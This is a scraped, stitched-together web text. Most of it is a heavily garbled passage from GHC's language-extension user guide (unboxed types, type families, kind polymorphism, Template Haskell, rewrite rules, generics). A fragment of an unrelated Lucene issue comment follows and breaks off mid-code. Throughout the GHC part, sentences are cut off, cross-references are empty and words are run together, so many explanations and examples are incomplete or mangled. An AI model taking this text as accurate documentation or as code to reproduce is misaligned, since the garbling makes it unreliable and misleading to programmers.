Back to our if statement, when the condition was true, we assigned the delegate the method Add() and when the value was false, we assigned it with the Subtract() method. Line 40 executes our delegate containing the reference of the assigned method. Executing the delegate also executes the method it refers. | https://compitionpoint.com/delegates/ | CC-MAIN-2021-31 | refinedweb | 566 | 56.25 |
language, GHC extensions, GHC As with all known Haskell systems, GHC implements some extensions to the language. They can all be enabled or disabled by commandline. Language options languageoption optionslanguage extensionsoptions controlling The language option primops make extensive use of unboxed types and unboxed tuples, which we briefly summarise here. Unboxed types Unboxed types (Glasgow extension). We use the convention (but it is only a convention) that primitive types, values, and operations have a # suffix (see ).. There are some restrictions on the use of primitive types: The main restriction is).#. Unboxed Tuples ... Unboxed tuples may not be nested. So this is illegal: f :: (# Int, (# Int, Int #), Bool #) -XMagicHash extension then allows you to refer to the Int# that is now in scope. The -XMagicHash also enables some new forms of literals (see ): #). View patterns manage sharing). Without view patterns, using this signature (.. n+k patterns -XNPlusKPatterns n+k pattern support is disabled by default. To enable it, you can use the -XNPlusKPatterns flag. Traditional record syntax -XNoTraditionalRecordSyntax Traditional record syntax, such as C {f = x}, is enabled by default. To disable it, you can use the -XNoTraditionalRecordSyntax flag.. Recursive binding groups. The mdo notation Secton g depends on a textually following generator g', if g' defines a variable that is used by g, or g' textually appears between g and g'', where g depends on g''. flag -XRecursiveDo, or the LANGUAGE RecursiveDo pragma. (The same flag.) Parallel List Comprehensions list comprehensionsparallel parallel list comprehens. Generalised (SQL-Like) List Comprehensions list comprehensionsgeneralised extended list comprehensions group sql",...] Monad comprehensions monad comprehensions Monad comprehensions generalise the list comprehension notation, including parallel comprehensions () and transform. Monad comprehensions support rebindable syntax ().. Rebindable syntax and the implicit Prelude import -XNoImplicitPrelude option:! . Postfix. Tuple sections. Record field disambiguation's.) Record wildcards: Wildcards can be mixed with other patterns, including expressions, writing,. The ".." expands to the missing in-scope record fields. Specifically the expansion of "C {..}" includes f if and only if: f is a record field of constructor C. The record field f is in scope somehow (either qualified or unqualified). In the case of expressions (but not patterns), the variable f is in scope unqualified, apart from the binding of the record selector itself.). Local Fixity Declarations. Package-qualified imports. Safe imports ). Such data types have only one value, namely bottom. Nevertheless, they can be useful when defining "phantom types". Data type contexts. = ...; I'm not sure what it should be.) Liberalised type synonyms. So, for example, this will be rejected: type Pr = (# Int, Int #) h :: Pr -> Int h x = ... because GHC does not allow unboxed tuples on the left of a function arrow. Existentially quantified data constructors. Existentials and type classes. Record Constructors) Restrictions! Declaring data types with explicit constructor signatures , can only be declared using this form. Notice that GADT-style syntax generalises existential types ().RelaxedPolyRec. A GADT can only be declared using GADT-style syntax ();: TypeableX class, whose kind suits that of the data type constructor, and then writing the data type instance by hand. With -XDeriveGeneric, you can derive instances of the class Generic, defined in GHC.Generics. You can use these to define generic functions, as described in . Pars.) Class and instances declarations Class declarations This section, and the next one, documents GHC's type-class extensions. There's lots of background in the paper Type classes: exploring the design space (Simon Peyton Jones, Mark Jones, Erik Meijer).). Default method0 genum is filled-in, and type-checked with the type (Generic a, GEnum (Rep a)) => [a]. We use default signatures to simplify generic programming in GHC (). Functional dependencies. Rules for functional dependencies In a class declaration, all of the class type variables must be reachable (in the sense mentioned in )'s (namely (s a)) and the element type a. Occasionally this really doesn't work, in which case you can split the class like this: class CollE s where empty :: s class CollE s => Coll s a where insert :: s -> a ->,'s.) The willingness to be overlapped or incoherent is a property of the instance declaration itself, controlled by the presence or otherwise of the -XOverlappingInstances and -XIncoherentInstances flags when that module is being defined. Specifically, during the lookup process: If the constraint being looked up matches two instance declarations IA and IB, and IB is a substitution instance of IA (but not vice versa); that is, IB is strictly more specific than IA either IA or IB was compiled with -XOverlappingInstances then the less-specific instance IA is ignored.. The -XIncoherentInstances flag implies the -XOverlappingInstances flag, but not vice versa. Type signatures in instance declarations The type signature in the instance declaration must be precisely the same as the one in the class declaration, instantiated with the instance type. (), the forall b scopes over the definition of foo, and in particular over the type signature for xs. Overloaded string literals.. Data :: * -> * Data type -- WRONG: These two equations together... foo B = 2 -- ...will produce a type error. are - in contrast to GADTs - are open; i.e., new instances can always be added, possibly in other modules. Supporting pattern matching across different data instances would require a form of extensible case construct.) Overlap of data instances The instance declarations of a data family used in a single program may not overlap at all, independent of whether they are associated or not. In contrast to type class instances, this is not only a matter of consistency, but one of type safety.. Type Type instance declarations Overlap of type synonym instances example to illustrate the condition under which overlap is permitted. type instance F (a, Int) = [a] type instance F (Int, b) = [b] -- overlap permitted type instance G (a, Int) = [a] type instance G (Char, a) = [a] -- ILLEGAL overlap, as [Char] /= [Int] Decidability of type synonym do not contain any type family constructors, the total number of symbols (data type constructors and type variables) in s1 .. sm is strictly smaller than in t1 .. tn, and for every type variable a, a occurs in s1 .. sm. Associated data and type families A data or type synonym family can be declared as part of a type class, thus: class GMapKey k where data GMap k :: * -> * ... class Collects ce where type Elem ce :: * ... When doing so, we. Associated instances When an associated data or type synonym family instance is declared within a type class instance, we most important point about associated family instances is that the type indexes corresponding to class parameters must be identical to the type given in the instance head; here this is the first argument of GMap, namely Either a. Although it is unusual, there *). Associated type synonym defaults It is possible for the class defining the associated type to specify a default for associated type instances. So for example, this is OK: class IsBoolMap v where type Key v type Key v = Int lookupKey :: Key v -> v -> Maybe Bool instance IsBoolMap [(Int, Bool)] where lookupKey = lookup There can also be multiple defaults for a single type, as long as they do not overlap: class C a where type F a b type F a Int = Bool type F a Bool = Int A default declaration is not permitted for an associated data type. Scoping of class parameters. Import and export The rules for export lists (Haskell Report Section 5.2) needs adjustment for type families: The form T(..), where T is a data family, names the family T and all the in-scope constructors (whether in scope qualified or unqualified) that are data instances of T. The form T(.., ci, .., fj, ..), where T is a data family, names T and the specified constructors ci and fields fj as usual. The constructors and field names must belong to some data instance of T, but are not required to belong to the same instance. The form C(..), where C is a class, names the class C and all its methods and associated types. The form C(.., mi, .., type Tj, ..), where C is a class, names the class C, and the specified methods mi and associated types Tj. The types need a keyword "type" to distinguish them from data constructors. Examples's, but not the data family D. That (annoyingly) means that you cannot selectively import Y selectively, thus "import Y( D(D1,D2) )", because Y does not export D. Instead you should list the exports explicitly, thus: module Y( D(..) ) where ... or module Y( module Y, D ) where ... Instances Family instances are implicitly exported, just like class instances. However, this applies only to the heads of instances, not to the data constructors an instance defines. Type families and instance declarations Type families require us to extend the rules for the form of instance heads, which are given in . ... Kind polymorphism This section describes kind polymorphism, and extension enabled by -XPolyKinds. It is described in more detail in the paper Giving Haskell a Promotion, which appeared at TLDI 2012. Overview of kind polymorphism Currently there is a lot of code duplication in the way Typeable is implemented (): class Typeable (t :: *) where typeOf :: t -> TypeRep class Typeable1 (t :: * -> *) where typeOf1 :: t a -> TypeRep class Typeable2 (t :: * -> * -> *) where typeOf2 :: t a b -> TypeRep Kind polymorphism (with -XPolyKinds) allows us to merge all these classes into one: data Proxy t = Proxy class Typeable t where typeOf :: Proxy t -> TypeRep instance Typeable Int where typeOf _ = TypeRep instance Typeable [] where typeOf _ = TypeRep Note that the datatype Proxy has kind forall k. k -> * (inferred by GHC), and the new Typeable class has kind forall k. k -> Constraint. Overview Generally speaking, with -XPolyKinds, GHC will infer a polymorphic kind for un-decorated whenever possible. For example: data T m a = MkT (m a) -- GHC infers kind T :: forall k. (k -> *) -> k -> * Just as in the world of terms, you can restrict polymorphism using a signature (-XPolyKinds implies -XKindSignatures): data T m (a :: *) = MkT (m a) -- GHC now infers kind T :: (* -> *) -> * -> * There is no "forall" for kind variables. Instead, you can simply mention a kind variable in a kind signature, thus: data T (m :: k -> *) a = MkT (m a) -- GHC now infers kind T :: forall k. (k -> *) -> k -> * Polymorphic kind recursion and complete kind signatures kind signature for T. The way to give a complete kind signature for a data type is to use a GADT-style declaration with an explicit kind signature thus: data: A GADT-style data type declaration, with an explicit "::" in the header. For example: data T1 :: (k -> *) -> k -> * where ... -- Yes T1 :: forall k. (k->*) -> k -> * data T2 (a :: k -> *) :: k -> * where ... -- Yes T2 :: forall k. (k->*) -> k -> * data T3 (a :: k -> *) (b :: k) :: * where ... -- Yes T3 :: forall k. (k->*) -> k -> * data T4 a (b :: k) :: * where ... -- YES T4 :: forall k. * -> k -> * data T5 a b where ... -- NO kind is inferred data T4 (a :: k -> *) (b :: k) where ... -- NO kind is inferred It makes no difference where you put the "::" but it must be there. You cannot give a complete kind signature using a Haskell-98-style data type declaration; you must use GADT syntax. A type or data family declaration always have a complete user-specified kind signature; no "::" is required: data family D1 a -- D1 :: * -> * data family D2 (a :: k) -- D2 :: forall k. k -> * data family D3 (a :: k) :: * -- D3 :: forall k. k -> * type family S1 a :: k -> * -- S1 :: forall k. * -> k -> * In a complete user-specified kind signature, any un-decorated type variable to the left of the "::" is considered to have kind "*". If you want kind polymorphism, specify a kind variable. Datatype promotion This section describes data type promotion, an extension to the kind system that complements kind polymorphism. It is enabled by -XDataKinds, and described in more detail in the paper Giving Haskell a Promotion, which appeared at TLDI 2012. Motivation Standard Haskell has a rich type language. Types classify terms and serve to avoid many common programming mistakes. The kind language, however, is relatively simple, distinguishing only lifted types (kind *), type constructors (eg. kind * -> * -> *), and unlifted types (). In particular when using advanced type system features, such as type families () or eg.. Overview With -XDataKinds, GHC automatically promotes every suitable datatype to be a kind, and its (value) constructors to be type constructors. The following types data Nat = Ze | Su Nat data List a = Nil | Cons a (List a) data Pair a b = Pair a b data Sum a b = L a | R b give rise to the following kinds and type constructors: Nat :: BOX Ze :: Nat Su :: Nat -> Nat List k :: BOX Nil :: List k Cons :: k -> List k -> List k Pair k1 k2 :: BOX Pair :: k1 -> k2 -> Pair k1 k2 Sum k1 k2 :: BOX L :: k1 -> Sum k1 k2 R :: k2 -> Sum k1 k2 where BOX is the (unique) sort that classifies kinds. Note that List, for instance, does not get sort BOX -> BOX, because we do not further classify kinds; all kinds have sort BOX. The following restrictions apply to promotion: We only promote datatypes whose kinds are of the form * -> ... -> * -> *. In particular, we do not promote higher-kinded datatypes such as data Fix f = In (f (Fix f)), or datatypes whose kinds involve promoted types such as Vec :: * -> Nat -> *. We do not promote datatypes whose constructors are kind polymorphic, involve constraints, or use existential quantification. We do not promote data family instances (). Distinguishing between types and constructors Since constructors and types share the same namespace, with promotion you can get ambiguous type names: data P -- 1 data Prom = P -- 2 type T = P -- 1 or promoted 2? In these cases, if you want to refer to the promoted constructor, you should prefix its name with a quote: type T1 = P -- 1 type T2 = 'P -- promoted 2 Note that promoted datatypes give rise to named kinds. Since these can never be ambiguous, we do not allow quotes in kind names. Just as in the case of Template Haskell (), there is no way to quote a data constructor or type constructor whose second character is a single quote. Promoted lists and tuples types) Note that this requires -XTypeOperators. Promoted Literals Numeric and string literals are prmoted to the type level, giving convenient access to a large number of predefined type-level constants. Numeric literals are of kind Nat, while string literals are of kind Symbol. These kinds are defined in the module GHC.TypeLits. Here is an exampe") Equality constraints. The Constraint kind Normally, constraints (which appear in types to the left of the => arrow) have a very restricted syntax. They can only be: Class constraints, e.g. Show a Implicit parameter constraints, e.g. ?x::Int (with the -XImplicitParams flag) Equality constraints, e.g. a ~ Int (with the -XTypeFamilies or -XGADTs flag) know, but the user has declared to have kind Constraint.. Other type system extensions Explicit universal quantification (forall).) => type (Here, we write the "foralls" explicitly, although the Haskell source language omits them; in Haskell 98, all the free type variables of an explicit source-language type signature are universally quantified, except for the class type variables in a class declaration. However, in GHC, you can give the foralls if you want. See )..ized sort function in terms of an explicitly parameterized sortBy function: sortBy :: (a -> a -> Bool) -> [a] -> [a] sort :: (?cmp :: a -> a -> Bool) => [a] -> [a] sort = sortBy ?cmp Implicit-parameter type constraints's call site is quite unambiguous, and fixes the type a. Implicit-parameter bindings An implicit parameter is bound using the standard let or where binding forms. For example, we define the min function by binding cmp. min :: Implicit parameters and polymorphic recursion. Implicit parameters and monomorphism. Explicitly-kinded quantification's. Arbitrary-rank polymorphism.]) -> Swizzle: data T a = MkT (Either a b) (b -> b) it's just as if you had written this: data T a = MkT (forall b. Either a b) (forall b. b ->. Type inference In general, type inference for arbitrary-rank types is undecidable.. Implicit quantification GHC supports impredicative polymorphism, enabled with -XImpredicativeTypes. This means that you can]). The technical details of this extension are described in the paper Boxy types: type inference for higher-rank types and impredicativity, which appeared at ICFP 2006. Lexically scoped type variables. ()) Declaration type signatures's. Expression type signatures). Pattern type signatures., ''thing interprets thing in a type context. These Names can be used to construct Template Haskell expressions, patterns, declarations etc. They may also be given as an argument to the reify function.. (Compared to the original paper, there are many differences of detail. The syntax for a declaration splice uses "$" not "splice". The type of the enclosed expression must be Q [Dec], not [Q Dec]. Pattern splices and quotations are not implemented.) Using Template Haskell. A Template Haskell Worked Example] ->. The quoted string finishes at the first occurrence of the two-character sequence "|]". Absolutely no escaping is performed. If you want to embed that character sequence in the string, you must invent your own escape convention (such as, say, using the string "|~]" instead), and make your quoter function interpret "|~]" as "|]". One way to implement this is to compose your quoter with a pre-processing pass to perform your escape conversion. See the discussion in Trac for details. proc x -> f -< x+1 We arr (\ x -> x+1) >>>Plus class includes a combinator ArrowPlus. In the translation box, first apply the following transformation: for each pattern pi that is of form !qi = ei, transform it to (xi,!qi) = ((),ei), and replace e0 by (xi `seq` e0). Then, when none of the left-hand-side patterns have a bang at the top, apply the rules in the existing box. (). The call inline f tries very hard to inline f. To make sure that f can be inlined, it is a good idea to mark the definition of f as INLINABLE, so that GHC guarantees to expose an unfolding regardless of how big it is. Moreover, by annotating f as INLINABLE, you ensure that f. Moreover, you can also SPECIALIZE an imported function provided it was given an INLINABLE pragma at its definition site (). A SPECIALIZE has the effect of generating (a) a specialised version of the function and (b) a rewrite rule (see ) that rewrites a call to the un-specialised function into a call to the specialised one. Moreover, given a SPECIALIZE pragma for a function f, GHC will automatically create specialisations for any type-class-overloaded functions called by f, if they are in the same module as the SPECIALIZE pragma, or if they are INLINABLE; and so on, transitively. You can add phase control () to the RULE generated by a SPECIALIZE pragma, just as you can if you write a RULE directly. For example: {-# SPECIALIZE [0] hammeredLookup :: [(Widget, value)] -> Widget -> value #-} generates a specialisation rule that only fires in Phase 0 (the final phase). If you do not specify any phase control in the SPECIALIZE pragma, the phase control is inherited from the inline pragma (if any) of the function. For example: foo :: Num a => a -> a foo = ...blah... {-# NOINLINE [0] foo #-} {-# SPECIALIZE foo :: Int -> Int #-} The NOINLINE pragma tells GHC not to inline foo until subsequently. Obsoletein fact, UNPACK has no effect without -O, for technical reasons (see tick 5252),. NOUNPACK pragma NOUNPACK The NOUNPACK pragma indicates to the compiler that it should not unpack the contents of a constructor field. Example: data T = T {-# NOUNPACK #-} !(Int,Int) Even with the flags -funbox-strict-fields and -O, the field of the constructor T is not unpacked. and -ddump-rule-rewrites also shows what the code looks like before and after the rewrite.ma.ma is a modifier to INLINE/NOINLINE because it really only makes sense to match f on the LHS of a rule if you are sure that f is not going to be inlined before the rule has a chance to fire. List fusion The RULES mechanism is used to implement fusion (deforestation) of common list functions. If a "good consumer" consumes an intermediate list constructed by a "good producer", the intermediate list should be eliminated entirely. The following are good producers: List comprehensions Enumerations of Int, Integer and Char (e.g. ['a'..'z']). Explicit lists (e.g. [True, False]) The cons constructor (e.g 3:4:[]) ++ map take, filter iterate, repeat zip, zipWith The following are good consumers: List comprehensions array (on its second argument) ++ (on its first argument) foldr map take, filter concat unzip, unzip2, unzip3, unzip4 zip, zipWith (but on one argument only; if both are good producers, zip will fuse with one but not the other) partition head and, or, any, all sequence_ msum So, for example, the following should generate no intermediate lists: or -ddump-rule-rewrites. unsafeCoerce# allows you to fool the type checker. Generic classes GHC used to have an implementation of generic classes as defined in the paper "Derivable type classes", Ralf Hinze and Simon Peyton Jones, Haskell Workshop, Montreal Sept 2000, pp94-105. These have been removed and replaced by the more general support for generic programming. Generic programming Using a combination of -XDeriveGeneric () and -XDefaultSignatures (),. Deriving representations The first thing we need is generic representations. The GHC.Generics module defines a couple of primitive types that are used to represent Haskell datatypes: -- | The Generic class mediates between user-defined datatypes and their internal representation as a sum-of-products: class Generic a where -- Encode the representation of a user datatype type Rep a :: * -> * -- Convert from the datatype to its representation from :: a -> (Rep a) x -- Convert from the representation to the datatype to :: (Rep a) x -> a Instances of this class can be derived by GHC with the -XDeriveGeneric (), and are necessary to be able to define generic instances automatically. For example, a user-defined datatype of trees data UserTree a = Node a (UserTree a) (UserTree a) | Leaf gets the following representation: instance Generic (UserTree a) where -- Representation type type Rep (UserTree a) = M1 D D1UserTree ( M1 C C1_0UserTree ( M1 S NoSelector (K1 P a) :*: M1 S NoSelector (K1 R (UserTree a)) :*: M1 S NoSelector (K1 R (UserTree a))) :+: M1 C C1_1UserTree -- Meta-information data D1UserTree data C1_0UserTree data C1_1UserTree instance Datatype D1UserTree where datatypeName _ = "UserTree" moduleName _ = "Main" instance Constructor C1_0UserTree where conName _ = "Node" instance Constructor C1_1UserTree where conName _ = "Leaf" This representation is generated automatically if a deriving Generic clause is attached to the datatype. Standalone deriving can also be used. Writing generic functions Typically this class will not be exported, as it only makes sense to have instances for the representation types. Generic defaults The only thing left to do now is to define a "front-end" class, which is exposed to the user: class Serialize a where put :: a -> [Bin] default put :: (Generic a, GSerialize (Rep a)) => a -> [Bit]. More information For more detail please refer to the HaskellWiki page or the original paper: Jose Pedro Magalhaes, Atze Dijkstra, Johan Jeuring, and Andres Loeh. A generic deriving mechanism for Haskell. Proceedings of the third ACM Haskell symposium on Haskell (Haskell'2010), pp. 37-48, ACM, 2010. Note: the current support for generic programming in GHC is preliminary. In particular, we only allow deriving instances for the Generic class. Support for deriving Generic1 (and thus enabling generic functions of kind * -> * such as fmap) will come at a later stage.. | https://gitlab.haskell.org/nineonine/ghc/-/raw/166bbab5e7923e47b77d7f48f1be22eff4492228/docs/users_guide/glasgow_exts.xml?inline=false | CC-MAIN-2021-43 | refinedweb | 3,866 | 54.83 |
The Standard Template Library (STL) for AVR with C++ streams
Yes you did read that correctly, this post will present a port of the Standard Template Library, or STL as it’s more commonly known, to the AVR microcontrollers.
Introduction
The STL has been around forever in computing terms with copyright notices appearing in the source code as far back as 1994 and is tried and trusted by C++ programmers the world over. These days most of the STL is a part of the Standard C++ library that ships with full-size C++ compilers.
Which version?
I chose the SGI STL, released in 2000. Other versions that I considered were the GNU STL that ships built in to libstdc++ with gcc. This version was too well woven into the libstdc++ build to be easily extracted.
The other version I looked at was uSTL. This one promised to eliminate the gcc bloat and so it had potential. However I found that on the AVR platform, using the example on the uSTL webpage the code generated was 70% larger than that produced by the SGI STL so I feel somewhat justified in my choice.
Installation and configuration
The STL consists only of header files with all the source code inline. Simply download the zip file from my downloads page and unzip to a folder on your hard disk.
Users of the Arduino IDE should be careful to get the correct version. If you’re on the latest Arduino 1.0 (or more recent) IDE then you’ll need to download at least version 1.1 due to recent changes in the Arduino package detailed below.
Those of you that use Eclipse or a command line environment simply need to configure their compiler to reference the avr-stl/include directory.
If you want to use the STL from within the popular Arduino IDE then all you need to do is copy all the files in the avr-stl/include directory into the hardware/tools/avr/avr/include subdirectory of the Arduino installation. For example, on my system I would copy all the header files into here: C:Program Files (x86)\arduino-1.0.1\hardware\tools\avr\avr\include.
Configuration
Configuration is optional. You only need to change the defaults if you want to influence the STL memory management strategy.
All configuration options may be found in avr_config.h. Here’s what the default looks like.
namespace avrstl { // default alloc-ahead for vectors. quoting from the SGI docs: // // "It is crucial that the amount of growth is proportional to the current capacity(), // rather than a fixed constant: in the former case inserting a series of elements // into a vector is a linear time operation, and in the latter case it is quadratic." // // If this advice pertains to you, then uncomment the first line and comment out the second. // The default here in avr-land is to assume that memory is scarce. // template<typename T> size_t AvrVectorAllocAhead(size_t oldSize_) { return 2*oldSize_; } template<typename T> size_t AvrVectorAllocAhead(size_t oldSize_) { return 20+oldSize_; } // template<> size_t AvrVectorAllocAhead<char>(size_t oldSize_) { return 20+oldSize_; } // sample specialization for char // minimum buffer size allocated ahead by a deque inline size_t AvrDequeBufferSize() { return 20; } // alloc-ahead additional memory increment for strings. The default SGI implementation will add // the old size, doubling memory each time. We don't have memory to burn, so add 20 types each time template<typename T> size_t AvrStringAllocAheadIncrement(size_t oldSize_) { return 20; } }
The first section shows how you can influence how many places a vector allocates-ahead so that it has storage in the bank ready for future allocation requests. The default allocates 20 places ahead. I have shown some commented out examples of how to change this strategy both for all vectors and just for vectors that contain a particular type (char in this example).
The second and third sections show how you can control the allocate-ahead strategy for deque’s and strings. Like vectors the default is to be conservative with memory use.
Stream support
The SGI STL is quite pure in that it does not attempt to supply a streams implementation itself, instead relying on its presence in the environment. avr-libc does not provide streams, so I have provided it via a port of the streams part of the uClibc++ project. Specifically, you get:
- ostream, istream, iostream base classes
- The istringstream and ostringstream string streams
- Stream iterators
Plus some bonuses if you’re a user of the Arduino platform:
- ohserialstream, ihserialstream, iohserialstream for reading and writing from and to the hardware serial ports on the Arduino. These streams wrap an instance of the HardwareSerial class.
- olcdstream for writing to an LCD character display (wraps an instance of LiquidCrystal).
Memory considerations
No discussion of a microcontroller STL port is complete without taking into account memory considerations. Firstly, flash memory. Your flash usage is going to depend on the templates that you use because templates take up no space until they are declared.
If all you need are the most popular templates such as
string and
vector then even a 16K microcontroller may be enough. If you really go to town on the containers then even a 32K controller is going to start feeling tight. Heavy users would be wise to choose an ATmega1280 (Arduino mega).
Secondly, SRAM. Again, this depends on your usage. I have made modifications (that you can customise) to ensure that the growth policy of the popular
vector and
string classes is suitable for 2K controllers. The complex containers such as
map and
set use a memory-hungry backing tree to implement their structure. You would be wise to step up to an ATmega1280 if you want to use these with lots of objects.
I have verified that all the containers are neutral in their use of dynamic memory. That is, if you declare a container, use it as much as you want and then let it go out of scope then your controller’s dynamic memory is returned to exactly the state in which it started. To do this I used the dynamic memory monitoring tools from this post. I encourage you to use these to monitor your own code.
Operators new and delete
The STL requires implementations of
new, placement
new and
delete. If your program does not already define them then exactly one of your project .cpp files must do the following.
Recent versions of the Arduino IDE (definitely 1.0 and possibly as early as 0022) have made an attempt to support operators
new and
delete by supplying their own version of new.cpp that automatically gets included in every IDE build.
Unfortunately the authors have only done half a job in that they’ve forgotten to include placement
new so as yet I can’t entirely get rid of this kludge, but the procedure is now slightly different for Arduino 1.0 users.
Arduino 1.0
You will have downloaded avr-stl-1.1.zip and you need to do this:
#include <pnew.cpp>
Arduino 0021 and earlier
You will have downloaded avr-stl-1.0.zip and you need to do this:
#include <new.cpp>
That will ensure that the operators are defined. Failure to do this will result in the following compiler error: undefined reference to `operator new(unsigned int, void*)’.
A summary of what’s ported
Here is a summary of what you can use from the STL with some sample code. I’m not going to go crazy on the samples here as the web is awash with STL tutorials and samples.
vector
#include <vector> /* * Test std::vector */ struct TestVector { static void RunTest() { std::ohserialstream serial(Serial); std::vector<int> vec; std::vector<int>::const_iterator it; int i; vec.reserve(50); for(i=0;i<50;i++) vec.push_back(i); for(it=vec.begin();it!=vec.end();it++) serial << *it << std::endl; } };
Dynamic memory usage for a
vector is quite good as there is almost no additional overhead over and above the space required for the objects themselves. I have implemented a default allocate-ahead policy of 20 objects which you can change if you want (see later). If you have a rough idea of how many objects you are going to need then you can greatly cut down on memory resizing by calling the
reserve(n) function ahead of time.
Note that I have also ported the template specialisation of
vector for
bool, i.e.
std::vector<bool>. This is implemented as an array of single bits that is highly efficient in its memory usage.
string
#include <string> /* * Test std::vector */ struct TestString { static void RunTest() { std::ohserialstream serial(Serial); std::string str; char c; for(c='A';c<='Z';c++) str+=c; serial << str << std::endl; } };
std::basic_string and its wildly popular typedef
std::string are both there in full. The default allocate-ahead policy is for 20 objects but you can customize that for your needs.
bitset
#include <bitset> /* * Test std::bitset */ struct TestBitset { static void RunTest() { std::ohserialstream serial(Serial); std::bitset<64> mybits(0); // set bits 63 and 31 using // different methods mybits[63]=1; mybits|=0x80000000; serial << mybits; } };
std::bitset offers a fixed size set of bits that you can operate on using familar logical operators. This class is very efficient with memory.
deque, stack, queue, priority_queue
deque,
stack and
queue are all ported.
deque is much like a
vector but has a higher SRAM overhead and for that reason I prefer
vector instead.
stack and
queue can be declared to use
vector internally instead of the default
deque, and the example below shows that.
#include <stack> #include <vector> /* * Test std::stack */ struct TestStack { static void RunTest() { std::ohserialstream serial(Serial); std::stack<int,std::vector<int> > stk; int i; for(i=0;i<20;i++) stk.push(i); while(!stk.empty()) { serial << stk.top() << ' '; stk.pop(); } serial << std::endl; } };
list
#include <list> /* * Test std::list */ struct TestList { static void RunTest() { std::ohserialstream serial(Serial); std::list<int> lst; std::list<int>::const_iterator it; int i; for(i=0;i<50;i++) lst.push_back(i); for(it=lst.begin();it!=lst.end();it++) serial << *it << ' '; serial << std::endl; } };
std::list is ported and may be used as expected. The chief advantage of a
list over a
vector is that modifications made away from the end of the data structure are faster. Memory usage is considerably higher for a
list than a
vector because of the overhead of maintaining the link structures so I recommend using a
vector if you have the choice, despite the fact that a
vector performs allocate-ahead and a
list does not.
The
std::slist (single linked list) SGI extension to the standard is also ported. You can use it if you like but I have found no advantage over the standard
std::list.
set, multiset, hash_set, hash_multiset
Here come the heavyweights.
set and
multiset are standard containers, the hashed equivalents are SGI extensions that don’t maintain sorted order within the backing tree.
These containers are not too bad on flash consumption but they do have an impact on SRAM. Consider whether you really need them, and if you do then monitor your memory consumption and make your choice of AVR device appropriately.
#include <set> /* * Test std::set */ struct TestSet { static void RunTest() { std::ohserialstream serial(Serial); std::set<int> s1,s2; int i; for(i=0;i<10;i++) s1.insert(i); for(i=5;i<15;i++) s2.insert(i); std::set_intersection( s1.begin(),s1.end(), s2.begin(),s2.end(), std::ostream_iterator<int>(serial," ")); serial << std::endl; } };
map, multimap, hash_map, hash_multimap
More heavyweights. Behind the scenes these containers use exactly the same tree structure as the
set and for that reason the same cautions regarding SRAM usage apply.
map and
multimap are standard, the hash equivalents are SGI extensions and may be useful if you don’t need to maintain sorted order.
#include <map> /* * Test std::map */ struct TestMap { static void RunTest() { std::ohserialstream serial(Serial); std::map<int,const char *> days; int i; days[1]="Monday"; days[2]="Tuesday"; days[3]="Wednesday"; days[4]="Thursday"; days[5]="Friday"; days[6]="Saturday"; days[7]="Sunday"; for(i=1;i<7;i++) serial << days[i] << std::endl; } };
Algorithms
Everything in the
<algorithm> and
<functional> headers is available. Sorting, searching etc. It’s all there. Have fun!
Arduino Extras
I added in a few extras that will make programming against some of the common Arduino classes more natural in an STL/streams environment.
Hardware serial stream
This allows you to drop the clunky
println() calls and use the more elegant streams. The constructor takes an instance of a
HardwareSerial class. Arduino users only have
Serial. Arduino Mega users have
Serial1,
Serial2,
Serial3. I have added
std::crlf to the namespace. This will expand to the two character sequence 13,10.
#include <HardwareSerial.h> #include <serstream> #include <iomanip> // for setprecision() #include <sstream> /* * Run some tests on the hardware serial stream */ static void RunTest() { std::ohserialstream serial(Serial); serial.begin(9600); serial << "Hello world" << std::crlf << "Floating point: " << std::setprecision(3) << 3.14159; } };
LiquidCrystal stream
This allows you to write to an LCD character display using streams.
#include <LiquidCrystal.h> #include <lcdostream> LiquidCrystal lcd(2,3,4,5,6,7); /* * Test the LCD output stream */ struct TestLcdOstream { static void RunTest() { lcd.begin(20,4); std::olcdstream stream(lcd); stream << std::clear() << std::move(5,1) << "Hello World"; } };
I have added two functions to the
std namespace:
clear() clears the LCD screen and
move(col,row) moves the cursor to a position on the display. As you can see from the code you still need to declare an instance of
LiquidCrystal and call
begin() on it before you can use the stream.
Update: 17th Feb 2012
There is a bug in the STL
<string> class affecting version 1.1 and below of this package. You need to download at least 1.1.1 to fix it.
The bug is easily reproduced with a simple sketch:
#include <iterator> #include <string> void setup() { std::string str("abc"); str.find_first_not_of("a"); } void loop() {}
The compiler will spit out a typically cryptic succession of template errors, with the key error being this one:
dependent-name 'std::basic_string::size_type' is parsed as a non-type, but instantiation yields a type c:/program files (x86)/arduino-1.0/ hardware/tools/avr/lib/gcc/../../avr/include/string:1106: note: say 'typename std::basic_string::size_type' if a type is meant
Basically the STL was written a long time ago when C++ compilers were a little more forgiving around dependent types inherited from templates. These days they are rightly more strict and you are forced to explicitly say that you mean a type using the
typename keyword.
If you want to fix the bug manually then it’s very easy, the solution is to modify the
<string> header file on line 1107 from this:
// ------------------------------------------------------------ // Non-inline declarations. template <class _CharT, class _Traits, class _Alloc> const typename basic_string<_CharT,_Traits,_Alloc>::size_type basic_string<_CharT,_Traits,_Alloc>::npos = (basic_string<_CharT,_Traits,_Alloc>::size_type) -1;
To this (insert the typename keyword):
// ------------------------------------------------------------ // Non-inline declarations. template <class _CharT, class _Traits, class _Alloc> const typename basic_string<_CharT,_Traits,_Alloc>::size_type basic_string<_CharT,_Traits,_Alloc>::npos = (typename basic_string<_CharT,_Traits,_Alloc>::size_type) -1;
For background information about why this happens, click here.
Update June 8th 2016
The source code is now on Github. The introduction of upgrades to the Arduino IDE is surfacing issues with the source code that need to be addressed. Hopefully with the source code now easily available we can work through the issues together.
Pingback: problem using std::map. Are there known obstructing macros? | CL-UAT() | http://andybrown.me.uk/2011/01/15/the-standard-template-library-stl-for-avr-with-c-streams/ | CC-MAIN-2017-17 | refinedweb | 2,613 | 53.61 |
Hey Everyone,
I need some help with cummulative sum, without using math class methods.
Heres the question
Write a method named pow that accepts integers for a base A and an exponent B and computes and returns A^B.
This is what i got so far..
Btw how do i put my code in the "red" box?Btw how do i put my code in the "red" box?Code :
//This is problem #3 on cum. sums. public class Powwow { public static void main(String[] args) { prod = 1; for(int i = 1; i <= 1; i++); System.out.println("prod = prod * a"); } }
Thanks | http://www.javaprogrammingforums.com/%20whats-wrong-my-code/1189-cummulative-sum-prob-need-some-help-printingthethread.html | CC-MAIN-2014-35 | refinedweb | 101 | 85.08 |
[
]
Hoss Man commented on LUCENE-1316:
----------------------------------
bq. Code that depended on deletes being instantly visible across threads would no longer be
guaranteed.
you lost me there ... why would deletes be stop being instantly visible if we changed this...
{code}
public synchronized boolean isDeleted(int n) {
